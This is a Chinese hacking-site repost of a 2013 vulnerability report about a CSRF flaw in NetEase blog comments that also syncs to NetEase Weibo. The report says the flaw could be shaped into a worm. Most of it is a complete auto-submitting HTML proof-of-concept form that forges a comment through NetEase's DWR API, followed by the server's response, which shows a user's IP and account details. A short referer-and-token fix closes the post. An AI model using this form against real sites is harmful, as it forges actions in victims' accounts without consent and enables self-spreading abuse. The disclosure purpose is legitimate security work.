记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网易一处CSRF波及博客和微博,精心构造后可导致蠕虫

2013-05-07 13:10

1)问题缺陷在网易博客的回复功能,该处功能会同步到网易微博,未校验referer;



 2)登录网易博客,运行以下POC;


<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method="POST">
<input type="text" name="callCount" value="1" />
<input type="text" name="scriptSessionId" value="${scriptSessionId}187" />
<input type="text" name="c0-scriptName" value="BlogBeanNew" />
<input type="text" name="c0-methodName" value="addBlogComment" />
<input type="text" name="c0-id" value="0" />
<input type="text" name="c0-e1" value="string:fks_087065080081084067086083081071072087083074083095081070093" />
<input type="text" name="c0-e2" value="number:12979759" />
<input type="text" name="c0-e3" value="string:" />
<input type="text" name="c0-e4" value="string:ddd" />
<input type="text" name="c0-e5" value="string:i_majia" />
<input type="text" name="c0-e6" value="string:" />
<input type="text" name="c0-e7" value="number:-1" />
<input type="text" name="c0-e8" value="number:-1" />
<input type="text" name="c0-e9" value="number:12979759" />
<input type="text" name="c0-e10" value="string:lli.vip" />
<input type="text" name="c0-e11" value="string:%E6%9D%8E%E9%BB%8E" />
<input type="text" name="c0-e12" value="boolean:true" />
<input type="text" name="c0-param0" value="Object_Object:{blogId:reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12}" />
<input type="text" name="c0-param1" value="string:" />
<input type="text" name="c0-param2" value="boolean:false" />
<input type="text" name="batchId" value="675126" />
<input type="submit" value="submit">
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>

其中参数"c0-e4"的值即为回复内容;

 

3)运行POC系统返回结果如下;


//#DWR-INSERT
//#DWR-REPLY
var s0=[];
dwr.engine._remoteHandleCallback('675126','0',{'abstract':"ddd",blogId:"fks_087065080081084067086083081071072087083074083095081070093",blogPermalink:"blog/static/129797592013126105133453",blogTitle:"\u996E\u98DF\u5F80\u4E8B\uFF082\uFF09",blogUserId:12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 ",lastUpdateTime:1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0});

4)返回微博站点,刷新微博,查看效果;



修复方案:

校验referer,加入token

知识来源: www.2cto.com/Article/201305/208590.html

阅读:98673 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“网易一处CSRF波及博客和微博,精心构造后可导致蠕虫”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云